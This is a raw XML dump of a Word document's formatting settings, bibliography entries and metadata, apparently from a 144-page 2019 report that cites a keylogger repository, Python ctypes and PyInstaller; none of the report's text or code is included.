        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1344355342">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0329286">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1352488176">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67489639">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382137">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7389267">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1378622654">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0593905">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6025236">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141769">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08422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0328962">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097652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24301456">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1424451583">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1427313825">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1428233505">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2974710">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38065401">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1439790832">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1441071344">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41993984">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1444610461">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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47121072">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1448888882">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5760549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66318328">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0616458">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="148099479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03810649">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1505583334">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27673068">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459044">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3974725">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1548028475">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2770016">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1555654439">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58585139">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66136585">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1569220982">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86914075">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7888325">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2666884">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1616447294">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47373">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28967220">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1630092398">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097522">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1500368">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1643075397">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5602550">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59731194">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69822550">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1672026253">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84476357">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1688943851">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="169037616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244958">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0950841">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1711225500">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16659152">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3966995">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6874147">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77601924">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1779638000">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1787579617">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1787961957">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794908194">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1802455047">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1809274067">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1810123933">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1146041">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4490317">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1836070250">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331065">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4226753">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429183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09923634">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25408953">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1928687536">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1932470279">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486129">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2301497">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1945260996">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045560">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67278152">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1969043925">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5969951">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0115859">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2002654498">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207930">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28485647">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2029602952">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2032223602">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464846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38968041">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45473399">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2316740">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6278684">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2079787340">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89378439">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20894199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6903095">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4766363">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2105219919">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5958201">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17407577">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7117114">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2127118719">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4227149">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github.com/gabimarti/Demons-eye-keylogger"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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.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2</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
    <b:Tag>Pyt</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{C58A3AC8-0F81-42F9-8D86-2C00462EFB31}</b:Guid>
    <b:Title>Python ctypes — A foreign function library for Python</b:Title>
    <b:URL>https://docs.python.org/3/library/ctypes.html</b:URL>
    <b:RefOrder>93</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>PyI</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{6AB40B77-BEA3-4F40-9665-E6A9BC6476A6}</b:Guid>
    <b:Title>PyInstaller</b:Title>
    <b:URL>https://www.pyinstaller.org/</b:URL>
    <b:RefOrder>91</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Goo</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{331DEE1A-ACFE-4DDC-A379-B0EA4E58CD67}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Google</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Google Trends: keylogger</b:Title>
    <b:URL>https://trends.google.es/trends/explore?date=all&amp;q=keylogger</b:URL>
    <b:RefOrder>94</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{415F63C9-F460-4130-88B6-9877B2AF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4</TotalTime>
  <Pages>144</Pages>
  <Words>41499</Words>
  <Characters>228246</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2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95</cp:revision>
  <cp:lastPrinted>2019-09-19T16:30:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-06T11:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-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